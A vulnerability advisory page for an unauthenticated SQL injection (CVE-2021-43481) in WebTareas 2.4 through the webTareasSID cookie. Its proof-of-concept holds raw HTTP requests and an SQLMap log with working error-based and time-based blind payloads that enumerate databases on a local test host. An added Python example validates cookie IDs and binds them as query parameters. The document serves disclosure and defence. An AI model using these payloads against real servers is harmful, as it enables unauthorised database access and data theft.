
WebTareas 2.4 SQL Injection

Published: 27 Mar 2023 00:00:00
Reported by: Hubert Wojciechowski
Type: packetstorm
Source: packetstormsecurity.com

WebTareas 2.4 SQL Injection vulnerability

Related

| Reporter | Title | Published |
|---|---|---|
| 0day.today | WebTareas 2.4 - Blind SQL injection (Authenticated) Vulnerability | 11 May 2022 00:00 |
| Circl | CVE-2021-43481 | 21 Apr 2022 00:25 |
| CNNVD | webTareas SQL injection vulnerability | 20 Apr 2022 00:00 |
| CVE | CVE-2021-43481 | 20 Apr 2022 19:41 |
| Cvelist | CVE-2021-43481 | 20 Apr 2022 19:41 |
| Exploit DB | WebTareas 2.4 - Blind SQLi (Authenticated) | 11 May 2022 00:00 |
| EUVD | EUVD-2021-30412 | 3 Oct 2025 20:07 |
| NVD | CVE-2021-43481 | 20 Apr 2022 20:15 |
| Packet Storm | WebTareas 2.4 SQL Injection | 11 May 2022 00:00 |
| Prion | Sql injection | 20 Apr 2022 20:15 |

Code
`# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised)   
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: [email protected]  
# Vendor Homepage: https://sourceforge.net/projects/webtareas/  
# Software Link: https://sourceforge.net/projects/webtareas/  
# Version: 2.4  
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
## Example   
-----------------------------------------------------------------------------------------------------------------------  
Param: webTareasSID in cookie  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------  
GET /webtareas/administration/admin.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout  
Connection: close  
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------  
HTTP/1.1 302 Found  
Date: Sat, 15 Oct 2022 11:38:50 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: ../service_site/home.php?msg=permissiondenied  
Content-Length: 0  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------  
GET /webtareas/administration/admin.php HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/webtareas/general/login.php?msg=logout  
Connection: close  
Cookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------  
HTTP/1.1 302 Found  
Date: Sat, 15 Oct 2022 11:38:39 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: ../service_site/home.php?msg=permissiondenied  
Content-Length: 355  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br />  
<b>Warning</b>: Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />  
  
-----------------------------------------------------------------------------------------------------------------------  
SQLMap:  
-----------------------------------------------------------------------------------------------------------------------  
sqlmap resumed the following injection point(s) from stored session:  
---  
Parameter: Cookie #1* ((custom) HEADER)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1  
  
[11:49:03] [INFO] testing MySQL  
[11:49:03] [INFO] confirming MySQL  
do you want to URL encode cookie values (implementation specific)? [Y/n] Y  
[11:49:03] [INFO] the back-end DBMS is MySQL  
web application technology: PHP 7.4.30, Apache 2.4.54  
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  
[11:49:03] [INFO] fetching database names  
[11:49:04] [INFO] starting 6 threads  
[11:49:06] [INFO] retrieved: 'zxcv'  
[11:49:06] [INFO] retrieved: 'information_schema'  
[11:49:06] [INFO] retrieved: 'performance_schema'  
[11:49:06] [INFO] retrieved: 'test'  
[11:49:06] [INFO] retrieved: 'phpmyadmin'  
[11:49:06] [INFO] retrieved: 'mysql'  
available databases [6]:  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
[*] zxcv  
  
[11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'  
[11:49:06] [WARNING] your sqlmap version is outdated  
  
[*] ending @ 11:49:06 /2022-10-15/  
  
  
`
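
The second response above pairs a SQL syntax error with a failed write in a user-defined session save handler, which indicates that the `webTareasSID` cookie value is placed into a SQL statement. The following is an added defensive example, not part of the original advisory or the webTareas code base: it checks the cookie against the alphabet PHP uses for session IDs and binds it as a query parameter. SQLite stands in for MariaDB, and the `sessions` table, the function names and the sample cookie values are constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import unquote_to_bytes

COOKIE_NAME = "webTareasSID"  # cookie name from the advisory
GOOD_SID = "a1b2c3d4e5f6g7h8i9j0k1l2m3"  # constructed sample ID
# PHP-generated session IDs contain only 0-9, a-z, A-Z, "," and "-",
# and are 22 to 256 characters long.
SID_RE = re.compile(rb"[A-Za-z0-9,-]{22,256}")

def extract_sid(cookie_header):
    """Return the percent-decoded session cookie value as bytes, or None."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == COOKIE_NAME:
            return unquote_to_bytes(value)
    return None

def sid_is_wellformed(sid):
    """True only for values that look like an ID PHP itself would issue."""
    return sid is not None and SID_RE.fullmatch(sid) is not None

def load_session(db, cookie_header):
    """Return stored session data; malformed IDs never reach the database."""
    sid = extract_sid(cookie_header)
    if not sid_is_wellformed(sid):
        return None
    # Bound parameter: the ID travels as data, never as part of the SQL text.
    row = db.execute(
        "SELECT data FROM sessions WHERE id = ?", (sid.decode("ascii"),)
    ).fetchone()
    return row[0] if row else None

def make_demo_db():
    """In-memory SQLite store with one constructed session row (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY, data TEXT)")
    db.execute("INSERT INTO sessions VALUES (?, ?)", (GOOD_SID, "user=demo"))
    return db

if __name__ == "__main__":
    db = make_demo_db()
    # Constructed headers: a valid ID, one with a trailing quote, one with control bytes.
    for header in (f"{COOKIE_NAME}={GOOD_SID}", f"{COOKIE_NAME}={GOOD_SID}'",
                   f"{COOKIE_NAME}=Mt%00%07abc"):
        print(repr(header), "->", load_session(db, header))
```

The same format check can run over logged `Cookie` headers to flag requests whose session cookie is not a well-formed ID.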


Vulners AI Score: 9.4 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.0063